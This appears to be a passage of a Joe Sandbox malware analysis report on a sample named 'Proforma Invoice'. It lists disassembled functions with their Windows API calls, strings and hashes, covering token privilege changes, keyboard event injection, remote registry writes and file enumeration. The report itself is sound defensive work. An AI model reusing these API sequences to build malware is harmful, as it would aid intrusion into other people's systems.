                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: LongNamePath_memmove
                                                                                                • String ID:
                                                                                                • API String ID: 2514874351-0
                                                                                                • Opcode ID: eb006fafbc3911755220605b065ee0164af247f1ebf1bbbd7e4d5ce2a3bfd7bb
                                                                                                • Instruction ID: 4b7cd5f0a8e64de99a81879551d065eef6fd25c847bcd176ff25da3589b6eb47
                                                                                                • Opcode Fuzzy Hash: eb006fafbc3911755220605b065ee0164af247f1ebf1bbbd7e4d5ce2a3bfd7bb
                                                                                                • Instruction Fuzzy Hash: 96E0867690412857C720A6989C05FEA77EDDB8D6A1F0441BAFC08D7204D964AC808694
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: __fread_nolock
                                                                                                • String ID:
                                                                                                • API String ID: 2638373210-0
                                                                                                • Opcode ID: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                                                                                                • Instruction ID: dce476fe4d30458c3ba9a7980405a64c14025b088daff188e2fb3fe0c947802c
                                                                                                • Opcode Fuzzy Hash: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                                                                                                • Instruction Fuzzy Hash: B7E092B0104B009BD7788A24D800BA373E1EB05304F04091DF2EA83241EBA678418759
                                                                                                APIs
                                                                                                • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,006DDD42,?,?,00000000), ref: 006A5C5F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: FilePointer
                                                                                                • String ID:
                                                                                                • API String ID: 973152223-0
                                                                                                • Opcode ID: 5812133b4b470432cba33aa6ea2f237c832a28bba8dca4bb7fd4c4bc883fe342
                                                                                                • Instruction ID: 1b80edb0609474ff3fae6239d265afa6404dfe22d686bc3115e91dbeb11d538f
                                                                                                • Opcode Fuzzy Hash: 5812133b4b470432cba33aa6ea2f237c832a28bba8dca4bb7fd4c4bc883fe342
                                                                                                • Instruction Fuzzy Hash: 75D0C77464020CBFE710DB80DC46FA9777CD705710F500195FD0456290D6B27D508795
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: __wfsopen
                                                                                                • String ID:
                                                                                                • API String ID: 197181222-0
                                                                                                • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                                • Instruction ID: cfed3e86aff4b2883a65b5363f975343bed0710bde59a830a7ed71c7b4074703
                                                                                                • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                                • Instruction Fuzzy Hash: 67B0927644020C77CE012A82EC02F597B5A9B417A4F408024FB0C18162A677A6A49A89
                                                                                                APIs
                                                                                                • GetLastError.KERNEL32(00000002,00000000), ref: 0070D1FF
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLast
                                                                                                • String ID:
                                                                                                • API String ID: 1452528299-0
                                                                                                • Opcode ID: eff88c093368a5e79f25a79c7ba6000629d2602cccab097dee52fee4d6b312ba
                                                                                                • Instruction ID: f83751a90fe34052fedb76d94d7fe0d90d30cd4e0f408adb75059cfacb36a640
                                                                                                • Opcode Fuzzy Hash: eff88c093368a5e79f25a79c7ba6000629d2602cccab097dee52fee4d6b312ba
                                                                                                • Instruction Fuzzy Hash: C0715D30204301CFC754EF64C491AAAB7E6BF8A314F144A2DF8969B2A2DB34ED45CF56
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: AllocVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 4275171209-0
                                                                                                • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                • Instruction ID: 45ded5435293817653da590ebc5e4fd37f39147deba79eb33a7aaacb6a96f38a
                                                                                                • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                • Instruction Fuzzy Hash: 12319274A00105EBE718DF58C484AB9F7A6FB59310B6487A9E80ACB355DB31EDC2DBD0
                                                                                                APIs
                                                                                                • Sleep.KERNELBASE(000001F4), ref: 01E522B1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1769483837.0000000001E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01E50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_1e50000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: Sleep
                                                                                                • String ID:
                                                                                                • API String ID: 3472027048-0
                                                                                                • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                • Instruction ID: 73725aac8129de5bdfd185035120566863bba1694d6fd1430a9ec23875a26935
                                                                                                • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                • Instruction Fuzzy Hash: 0FE0E67594010EEFDB00EFB4D54969E7FB4EF04701F100161FD05E2281D6309D508A72
                                                                                                APIs
                                                                                                  • Part of subcall function 006A2612: GetWindowLongW.USER32(?,000000EB), ref: 006A2623
                                                                                                • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0072CB37
                                                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0072CB95
                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 0072CBD6
                                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0072CC00
                                                                                                • SendMessageW.USER32 ref: 0072CC29
                                                                                                • _wcsncpy.LIBCMT ref: 0072CC95
                                                                                                • GetKeyState.USER32(00000011), ref: 0072CCB6
                                                                                                • GetKeyState.USER32(00000009), ref: 0072CCC3
                                                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0072CCD9
                                                                                                • GetKeyState.USER32(00000010), ref: 0072CCE3
                                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0072CD0C
                                                                                                • SendMessageW.USER32 ref: 0072CD33
                                                                                                • SendMessageW.USER32(?,00001030,?,0072B348), ref: 0072CE37
                                                                                                • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0072CE4D
                                                                                                • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0072CE60
                                                                                                • SetCapture.USER32(?), ref: 0072CE69
                                                                                                • ClientToScreen.USER32(?,?), ref: 0072CECE
                                                                                                • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0072CEDB
                                                                                                • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0072CEF5
                                                                                                • ReleaseCapture.USER32 ref: 0072CF00
                                                                                                • GetCursorPos.USER32(?), ref: 0072CF3A
                                                                                                • ScreenToClient.USER32(?,?), ref: 0072CF47
                                                                                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 0072CFA3
                                                                                                • SendMessageW.USER32 ref: 0072CFD1
                                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 0072D00E
                                                                                                • SendMessageW.USER32 ref: 0072D03D
                                                                                                • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0072D05E
                                                                                                • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0072D06D
                                                                                                • GetCursorPos.USER32(?), ref: 0072D08D
                                                                                                • ScreenToClient.USER32(?,?), ref: 0072D09A
                                                                                                • GetParent.USER32(?), ref: 0072D0BA
                                                                                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 0072D123
                                                                                                • SendMessageW.USER32 ref: 0072D154
                                                                                                • ClientToScreen.USER32(?,?), ref: 0072D1B2
                                                                                                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0072D1E2
                                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 0072D20C
                                                                                                • SendMessageW.USER32 ref: 0072D22F
                                                                                                • ClientToScreen.USER32(?,?), ref: 0072D281
                                                                                                • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0072D2B5
                                                                                                  • Part of subcall function 006A25DB: GetWindowLongW.USER32(?,000000EB), ref: 006A25EC
                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 0072D351
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                                • String ID: @GUI_DRAGID$F$pbv
                                                                                                • API String ID: 3977979337-3138203584
                                                                                                • Opcode ID: 13b4737a03e3408e13619409525d161d6a60e3686973c8f46cf552c97b5c78e2
                                                                                                • Instruction ID: 54c469f77c285c07edaacf76bf66cf1934ae32d04b86e5fba3bc58d7e6c0e592
                                                                                                • Opcode Fuzzy Hash: 13b4737a03e3408e13619409525d161d6a60e3686973c8f46cf552c97b5c78e2
                                                                                                • Instruction Fuzzy Hash: E442CA78204291EFDB22CF28E844EAABBE5FF49310F14452DF596872A0C739DC51DB96
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: _memmove$_memset
                                                                                                • String ID: ]u$3ck$DEFINE$P\u$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)$_k
                                                                                                • API String ID: 1357608183-1354788764
                                                                                                • Opcode ID: bfcc1a9e5d2efc3664ee950d8cc1cbfc83390c57110e8a152ff5b59180907cea
                                                                                                • Instruction ID: 287d6efb535c9fbf1a0fde0b04e3014200a56445995810280ae6a00a4a2b9b1b
                                                                                                • Opcode Fuzzy Hash: bfcc1a9e5d2efc3664ee950d8cc1cbfc83390c57110e8a152ff5b59180907cea
                                                                                                • Instruction Fuzzy Hash: 7C938275A04219DBDB24CF58C8917FDB7B2FF48710F24816AEA55AB381E7709E82CB50
                                                                                                APIs
                                                                                                • GetForegroundWindow.USER32(00000000,?), ref: 006A48DF
                                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 006DD665
                                                                                                • IsIconic.USER32(?), ref: 006DD66E
                                                                                                • ShowWindow.USER32(?,00000009), ref: 006DD67B
                                                                                                • SetForegroundWindow.USER32(?), ref: 006DD685
                                                                                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 006DD69B
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 006DD6A2
                                                                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 006DD6AE
                                                                                                • AttachThreadInput.USER32(?,00000000,00000001), ref: 006DD6BF
                                                                                                • AttachThreadInput.USER32(?,00000000,00000001), ref: 006DD6C7
                                                                                                • AttachThreadInput.USER32(00000000,?,00000001), ref: 006DD6CF
                                                                                                • SetForegroundWindow.USER32(?), ref: 006DD6D2
                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 006DD6E7
                                                                                                • keybd_event.USER32(00000012,00000000), ref: 006DD6F2
                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 006DD6FC
                                                                                                • keybd_event.USER32(00000012,00000000), ref: 006DD701
                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 006DD70A
                                                                                                • keybd_event.USER32(00000012,00000000), ref: 006DD70F
                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 006DD719
                                                                                                • keybd_event.USER32(00000012,00000000), ref: 006DD71E
                                                                                                • SetForegroundWindow.USER32(?), ref: 006DD721
                                                                                                • AttachThreadInput.USER32(?,?,00000000), ref: 006DD748
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                • String ID: Shell_TrayWnd
                                                                                                • API String ID: 4125248594-2988720461
                                                                                                • Opcode ID: f36fafbf784b655fd7fba17b324377a987a88fcbb321e3b49e841bf9b236f53c
                                                                                                • Instruction ID: 9f8ecac291f654c9837d8bf80b8a50900079f67ea05ad2a767e0d17bcb0dcae0
                                                                                                • Opcode Fuzzy Hash: f36fafbf784b655fd7fba17b324377a987a88fcbb321e3b49e841bf9b236f53c
                                                                                                • Instruction Fuzzy Hash: EC317571A40318BBEB306B619C49FBF7E7DEB44B50F104076FA04EA2D1C6B45D12AAA5
                                                                                                APIs
                                                                                                  • Part of subcall function 006F87E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 006F882B
                                                                                                  • Part of subcall function 006F87E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 006F8858
                                                                                                  • Part of subcall function 006F87E1: GetLastError.KERNEL32 ref: 006F8865
                                                                                                • _memset.LIBCMT ref: 006F8353
                                                                                                • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 006F83A5
                                                                                                • CloseHandle.KERNEL32(?), ref: 006F83B6
                                                                                                • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 006F83CD
                                                                                                • GetProcessWindowStation.USER32 ref: 006F83E6
                                                                                                • SetProcessWindowStation.USER32(00000000), ref: 006F83F0
                                                                                                • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 006F840A
                                                                                                  • Part of subcall function 006F81CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,006F8309), ref: 006F81E0
                                                                                                  • Part of subcall function 006F81CB: CloseHandle.KERNEL32(?,?,006F8309), ref: 006F81F2
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                                • String ID: $default$winsta0
                                                                                                • API String ID: 2063423040-1027155976
                                                                                                • Opcode ID: f04ed69b661d8cd7948c447bb1e69d52a34f1d867f49d56159d0341ed2b0d8db
                                                                                                • Instruction ID: e23a9ab6436eca1fc9cf66cb0a7076d92d013e764a8893dce6c6b3362bef4f1e
                                                                                                • Opcode Fuzzy Hash: f04ed69b661d8cd7948c447bb1e69d52a34f1d867f49d56159d0341ed2b0d8db
                                                                                                • Instruction Fuzzy Hash: 0E8147B190020DAFDF619FA4DC45AFE7BBAFF04304F1481A9FA10A7261DB359A15DB24
                                                                                                APIs
                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 0070C78D
                                                                                                • FindClose.KERNEL32(00000000), ref: 0070C7E1
                                                                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0070C806
                                                                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0070C81D
                                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 0070C844
                                                                                                • __swprintf.LIBCMT ref: 0070C890
                                                                                                • __swprintf.LIBCMT ref: 0070C8D3
                                                                                                  • Part of subcall function 006A7DE1: _memmove.LIBCMT ref: 006A7E22
                                                                                                • __swprintf.LIBCMT ref: 0070C927
                                                                                                  • Part of subcall function 006C3698: __woutput_l.LIBCMT ref: 006C36F1
                                                                                                • __swprintf.LIBCMT ref: 0070C975
                                                                                                  • Part of subcall function 006C3698: __flsbuf.LIBCMT ref: 006C3713
                                                                                                  • Part of subcall function 006C3698: __flsbuf.LIBCMT ref: 006C372B
                                                                                                • __swprintf.LIBCMT ref: 0070C9C4
                                                                                                • __swprintf.LIBCMT ref: 0070CA13
                                                                                                • __swprintf.LIBCMT ref: 0070CA62
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                                                                • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                                • API String ID: 3953360268-2428617273
                                                                                                • Opcode ID: 12071bb730e86717104645ae28c710bc2299b366acf805af3666d3f4efc18d51
                                                                                                • Instruction ID: 2bc03c3b54754ebda785941a325a1e4c09a77bdf0ae5f9fc107585d3c3602cf0
                                                                                                • Opcode Fuzzy Hash: 12071bb730e86717104645ae28c710bc2299b366acf805af3666d3f4efc18d51
                                                                                                • Instruction Fuzzy Hash: 7FA11AB1408244ABC754FFA4C885DAFB7EDFF96700F40492DF59586291EA34EE08CB66
                                                                                                APIs
                                                                                                • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 0070EFB6
                                                                                                • _wcscmp.LIBCMT ref: 0070EFCB
                                                                                                • _wcscmp.LIBCMT ref: 0070EFE2
                                                                                                • GetFileAttributesW.KERNEL32(?), ref: 0070EFF4
                                                                                                • SetFileAttributesW.KERNEL32(?,?), ref: 0070F00E
                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 0070F026
                                                                                                • FindClose.KERNEL32(00000000), ref: 0070F031
                                                                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 0070F04D
                                                                                                • _wcscmp.LIBCMT ref: 0070F074
                                                                                                • _wcscmp.LIBCMT ref: 0070F08B
                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0070F09D
                                                                                                • SetCurrentDirectoryW.KERNEL32(00758920), ref: 0070F0BB
                                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 0070F0C5
                                                                                                • FindClose.KERNEL32(00000000), ref: 0070F0D2
                                                                                                • FindClose.KERNEL32(00000000), ref: 0070F0E4
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                                • String ID: *.*
                                                                                                • API String ID: 1803514871-438819550
                                                                                                • Opcode ID: 351bdf085dabe5488137227596d7e25a5fdcd6654c5bb9b95688b71df58350e8
                                                                                                • Instruction ID: 8f56b6a0579c43ee5adfbd637e63eaf39bffe6824e5e79241a981e86725e47ed
                                                                                                • Opcode Fuzzy Hash: 351bdf085dabe5488137227596d7e25a5fdcd6654c5bb9b95688b71df58350e8
                                                                                                • Instruction Fuzzy Hash: 1F31B432501219ABDB24EBB4DC49FEE77ECAF45360F10427AE804E21D1DB78DA45CA55
                                                                                                APIs
                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00720953
                                                                                                • RegCreateKeyExW.ADVAPI32(?,?,00000000,0072F910,00000000,?,00000000,?,?), ref: 007209C1
                                                                                                • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00720A09
                                                                                                • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00720A92
                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00720DB2
                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00720DBF
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: Close$ConnectCreateRegistryValue
                                                                                                • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                • API String ID: 536824911-966354055
                                                                                                • Opcode ID: 6471b42f0dc94601c681d6e74a190f7ebd510269266d6e6bcf2323be79cb9fb1
                                                                                                • Instruction ID: d4110789a193fe1397330d2afe21a39aa005c5af493b78db36d146cb44889490
                                                                                                • Opcode Fuzzy Hash: 6471b42f0dc94601c681d6e74a190f7ebd510269266d6e6bcf2323be79cb9fb1
